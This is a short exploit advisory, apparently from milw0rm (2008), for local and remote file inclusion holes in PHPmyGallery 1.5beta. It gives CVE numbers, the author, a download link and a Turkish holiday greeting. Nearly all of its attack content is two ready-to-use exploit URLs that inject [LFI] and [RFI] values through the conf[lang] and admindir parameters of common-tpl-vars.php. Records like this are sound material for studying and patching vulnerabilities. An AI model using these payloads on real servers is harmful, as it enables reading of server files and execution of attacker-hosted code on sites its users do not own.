PHPmyGallery 1.5beta - '/common-tpl-vars.php' Local/Remote File Inclusion

Related Vulnerabilities: CVE-2008-6318   CVE-2008-6317   CVE-2008-6316  
Publish Date: 09 Dec 2008
Author: CoBRa_21
                							

                *****************************************************************************************

Phpmygallery-1.5beta (common-tpl-vars.php) Multiple Local File Inclusion Vulnerabilities

*****************************************************************************************
 
Script Name: Phpmygallery
 
Version: 1.5beta
 
Autor: CoBRa_21
 
My Site: www.ipbul.org
 
Download: http://phpmygallery.kapierich.net/en/downloads/?dir=PHP/&getfile=PK_phpmygallery-1.5beta.zip
 
*****************************************************************************************
 
Exploit:
 
http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?conf[lang]= [LFÄ°] (Windows Only)
http://localhost/[PATH]/_conf/_php-core/common-tpl-vars.php?admindir=[RFI]

*****************************************************************************************

Not: Tüm İslam Aleminin Kurban Bayramı Mobarek Olsun

*****************************************************************************************

# milw0rm.com [2008-12-09]